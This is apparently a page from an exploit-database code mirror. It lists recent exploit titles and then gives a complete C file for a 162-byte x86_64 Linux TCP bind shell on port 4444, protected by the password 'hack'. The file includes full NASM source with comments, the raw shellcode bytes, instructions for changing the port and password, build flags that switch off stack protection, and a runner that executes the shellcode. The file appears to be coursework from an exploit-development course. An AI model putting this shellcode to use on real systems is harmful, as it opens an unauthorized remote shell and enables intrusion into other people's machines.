8fea20e59f
12 new exploits Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit Microsoft Windows WebDAV - Remote PoC Exploit Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit Microsoft Windows WebDav II - Remote Root Exploit (2) Microsoft Windows WebDAV - Remote Root Exploit (2) Microsoft Windows WebDav III - Remote Root Exploit (xwdav) Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav) Dream FTP 1.2 - Remote Format String Exploit BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit Apache Tomcat (webdav) - Remote File Disclosure Exploit Apache Tomcat (WebDAV) - Remote File Disclosure Exploit Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support) Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL) Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch) Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch) Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP) Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP) Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow Liferay 6.0.x Webdav File Reading Vulnerability Liferay 6.0.x WebDAV - File Reading Vulnerability Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1) Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2) Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3) Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4) BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2) Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1) Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability EasyCafe Server <= 2.2.14 Remote File Read EasyCafe Server <= 2.2.14 - Remote File Read x86_64 Linux bind TCP port shellcode TCP Bindshell with Password Prompt - 162 bytes x86_64 Linux bind TCP port shellcode TCP Bindshell with Password Prompt - 162 bytes Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#) CakePHP Framework 3.2.4 - IP Spoofing Multiples Nexon Games - Unquoted Path Privilege Escalation eXtplorer 2.1.9 - Archive Path Traversal Web interface for DNSmasq / Mikrotik - SQL Injection Microsoft Excel 2010 - Crash PoC Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation Web2py 2.14.5 - Multiple Vulnerabilities
204 lines
6.5 KiB
C
Executable file
204 lines
6.5 KiB
C
Executable file
/*---------------------------------------------------------------------------------------------------------------------
|
|
/*
|
|
*Title: tcp bindshell with password prompt in 162 bytes
|
|
*Author: Sathish kumar
|
|
*Contact: https://www.linkedin.com/in/sathish94
|
|
*Description: x64 Linux bind TCP port shellcode on port 4444 with reconfigurable password
|
|
*Tested On: Ubuntu 14.04 LTS
|
|
*SLAE64-1408
|
|
*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
|
|
* ./bindshell
|
|
* nc localhost 4444
|
|
*
|
|
*/
|
|
|
|
/*
|
|
* NOTE: This C code binds on port 4444
|
|
* The top of this file contains the .nasm source code
|
|
* The Port can be Reconfigured According to your needs
|
|
* Instructions for changing port number
|
|
* Port obtainer change the port value accorddingly
|
|
* port.py
|
|
* import socket
|
|
* port = 4444
|
|
* hex(socket.htons(port))
|
|
* python port.py
|
|
* Result : 0x5c11
|
|
* Replace the obtained value in the shellcode to change the port number
|
|
* For building the from .nasm source use
|
|
* nasm -felf64 filename.nasm -o filename.o
|
|
* ld filename.o -o filename
|
|
* To inspect for nulls
|
|
* objdump -M intel -D filename.o
|
|
|
|
|
|
global _start
|
|
|
|
_start:
|
|
|
|
jmp sock
|
|
prompt: db 'Passcode' ; initilization of prompt data
|
|
; sock = socket(AF_INET, SOCK_STREAM, 0)
|
|
; AF_INET = 2
|
|
; SOCK_STREAM = 1
|
|
; syscall number 41
|
|
|
|
sock:
|
|
|
|
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
|
|
xor rsi, rsi
|
|
mul rsi
|
|
push byte 0x2 ;pusing argument to the stack
|
|
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
|
|
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
|
|
push byte 0x29 ; pushing the syscall number into the rax by using stack
|
|
pop rax
|
|
syscall
|
|
|
|
; copying the socket descripter from rax to rdi register so that we can use it further
|
|
|
|
xchg rax, rdi
|
|
|
|
; server.sin_family = AF_INET
|
|
; server.sin_port = htons(PORT)
|
|
; server.sin_addr.s_addr = INADDR_ANY
|
|
; bzero(&server.sin_zero, 8)
|
|
; setting up the data sctructure
|
|
|
|
push 0x2 ;AF_INET value is 2 so we are pushing 0x2
|
|
mov word [rsp + 2],0x5c11 ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions
|
|
push rsp ; saving the complete argument to rsi register
|
|
pop rsi
|
|
|
|
|
|
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
|
|
; syscall number 49
|
|
|
|
push rdx ; Inserting the null to the stack
|
|
push byte 0x10
|
|
pop rdx ; value of the rdx register is set to 16 size sockaddr
|
|
push byte 0x31
|
|
pop rax ; rax register is set with 49 syscall for bind
|
|
syscall
|
|
|
|
;listen the sockets for the incomming connections
|
|
; listen(sock, MAX_CLIENTS)
|
|
; syscall number 50
|
|
|
|
pop rsi
|
|
push 0x32
|
|
pop rax ; rax register is set to 50 syscall for listen
|
|
syscall
|
|
|
|
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
|
|
;syscall number 43
|
|
|
|
push 0x2b
|
|
pop rax ; rax register is set to 43 syscall for accept
|
|
syscall
|
|
|
|
; storing the client socket description
|
|
mov r9, rax
|
|
|
|
; close parent
|
|
push 0x3
|
|
pop rax ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent
|
|
syscall
|
|
|
|
xchg rdi , r9
|
|
xor rsi , rsi
|
|
|
|
; initilization of dup2
|
|
push 0x3
|
|
pop rsi ; setting argument to 3
|
|
|
|
|
|
|
|
duplicate:
|
|
dec esi
|
|
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
|
|
syscall
|
|
jne duplicate
|
|
|
|
; Prompt for password
|
|
xor rax, rax
|
|
inc al ; rax register to value 1 syscall for write
|
|
push rax
|
|
pop rdi ; rdi register to value 1
|
|
lea rsi, [rel prompt]
|
|
xor rdx, rdx ; xor the rdx register to clear the previous values
|
|
push 0xe
|
|
pop rdx
|
|
syscall
|
|
|
|
; checking the password using read
|
|
password_check:
|
|
|
|
push rsp
|
|
pop rsi
|
|
xor rax, rax ; system read syscall value is 0 so rax is set to 0
|
|
syscall
|
|
push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
|
|
pop rax
|
|
lea rdi, [rel rsi]
|
|
scasd ; comparing the user input and stored password in the stack
|
|
jne Exit
|
|
|
|
|
|
execve: ; Execve format , execve("/bin/sh", 0 , 0)
|
|
xor rsi , rsi
|
|
mul rsi ; zeroed rax , rdx register
|
|
push ax ; terminate string with null
|
|
mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
|
|
push rbx
|
|
push rsp
|
|
pop rdi ; set RDI
|
|
push byte 0x3b ; execve syscall number (59)
|
|
pop rax
|
|
syscall
|
|
|
|
Exit:
|
|
|
|
;Exit shellcode if password is wrong
|
|
push 0x3c
|
|
pop rax ;syscall number for exit is 60
|
|
xor rdi, rdi
|
|
syscall
|
|
|
|
*/
|
|
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
|
|
//Port number this can be obtained from the above instrcutions
|
|
"\x11\x5c"
|
|
"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\x9d\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05"
|
|
//Password this can be obtained by
|
|
/*
|
|
* python
|
|
* password = 'hack'
|
|
* (password[::-1]).encode('hex')
|
|
* Reuslt : 6b636168
|
|
* This is stored in reverse beacuse of stack
|
|
*
|
|
*
|
|
*/
|
|
"\x68\x68\x61\x63\x6b"
|
|
"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";
|
|
|
|
|
|
main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", (int)strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
}
|
|
|
|
|